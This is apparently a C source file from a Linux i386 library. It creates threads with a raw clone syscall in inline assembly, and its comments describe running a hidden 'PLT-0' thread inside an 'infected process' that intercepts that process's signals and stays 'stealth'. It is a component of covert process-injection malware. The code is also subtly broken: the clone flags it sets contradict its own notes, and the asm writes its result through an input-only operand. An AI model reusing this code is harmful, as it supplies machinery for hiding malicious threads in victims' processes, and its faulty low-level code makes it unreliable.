/**
 * @file src/lib/plc/sysdep/linux/i386/plsys_tfork.c
 */
#include <plc.h>
#include <pllog.h>

#define CLONE_FLAGS	CLONE_PARENT | 	/* Same getppid()		*/ \
			CLONE_FS |	/* Same fs information		*/ \
			CLONE_FILES |	/* Same file descriptors	*/ \
			CLONE_SIGHAND |	/* Same sighandler table	*/ \
			CLONE_VM | 	/* Same memory space		*/ \
			CLONE_THREAD |	/* Same PID			*/ \
			CLONE_SYSVSEM |	/* Same Semaphores		*/ \
			CLONE_DETACHED | \
			CLONE_CHILD_CLEARTID

#if 0
		CLONE_PARENT_SETTID
		CLONE_CHILD_SETTID
		CLONE_CHILD_CLEARTID

		* Linux uses CLONE_XXX_SETTID to avoid a spinlock 
		  when creating a new thread and setting the tid into its ctx.

		* Linux uses CLONE_XXX_CLEARTID to mark the termination of
		  a thread, this way, somehow, the stack used by that thread
		  could be released by some garbage collector.
#endif
	
	/*
	 * NOTES: flags for PLT-0:
	 *
	 * CLONE_PARENT: DONT WANT. This way PLT-0 will be signaled when
	 * threads terminate, otherwise the hosting process will receive
	 * these signals.
	 * The problem is that PPID of PLT-0 parent will be the hosting thread
	 * and this is not stealth.
	 *
	 * CLONE_FS: DONT WANT. Do PLT-0 chdir/umask?
	 *
	 * CLONE_FILES: DONT WANT. PLT-0 close all fds.
	 *
	 * CLONE_NEWNS: (?). Need to be privileged (CAPS_SYS_ADMIN) to use it.
	 *
	 * CLONE_SIGHAND: WANT. This way PLT-0 shares the signal handler
	 * (not a copy of it) with the infected process, allowing PLT-0
	 * to intercept all signals delivered to it and act consecuently.
	 *
	 * CLONE_VM: WANT.
	 *
	 * CLONE_THREAD: DONT WANT. PLT-0 must be a thread group dealer, also
	 * by not specifying this flags we avoid other serious limitations
	 * (see clone(2) manpage)
	 *
	 * CLONE_PARENT_SETTID: DONT WANT
	 * CLONE_CHILD_SETTID: MAY BE WANT
	 * CLONE_CHILD_CLEARTID: DONT WANT
	 */

static void
_thread(void (*fn)(void *), void *arg)
{
	fn(arg);
	plsys_texit(0);
	/* NOTREACHED */
}


PLSTATUS PLEXPORT
plsys_tfork(long *tid, long stack, void (*fn)(long), long arg)
{
	long val, flags;

#if 0
	pldebug("%s: stack=%x, fn=%x, arg=%x\n",
	    __FUNCTION__, stack, (unsigned long)fn, (unsigned long)arg);
#endif

	if (fn == NULL || stack == 0) {
		return PLSTATUS_INVALID;
	}

	flags = CLONE_FLAGS;

	/* Force the child to call _thread() */
	*(long *)(stack     ) = arg;
	*(long *)(stack -  4) = (long)fn;
	*(long *)(stack -  8) = (long)0;
	*(long *)(stack - 12) = (long)_thread;

	stack -= 12;

	asm("		pushl	%%ebx		\n"
	    "		pushl	%%ecx		\n"
	    "		movl	%1, %%ebx	\n"
	    "		movl	%2, %%ecx	\n"
	    "		movl	$0x78, %%eax	\n"	/* SYS_clone */
	    "		int	$0x80		\n"
	    "		cmpl	$0, %%eax	\n"
	    "		jnz	plsys_tfork_end	\n"
	    "		ret			\n"
	    "plsys_tfork_end:			\n"
	    "		popl	%%ecx		\n"
	    "		popl	%%ebx		\n"
	    "		movl	%%eax, %0	\n"
	    :: "g" (val), "g" (flags), "g" (stack));

	/*
  	 * Parent
  	 */
	if (val < 0) {
		errno = -val;
		if (errno == EAGAIN) {
			return PLSTATUS_TRY_AGAIN;
		}
		return PLSTATUS_FAILED;
	}

	if (tid != NULL) {
		*tid = val;
	}

	return PLSTATUS_SUCCESS;
}


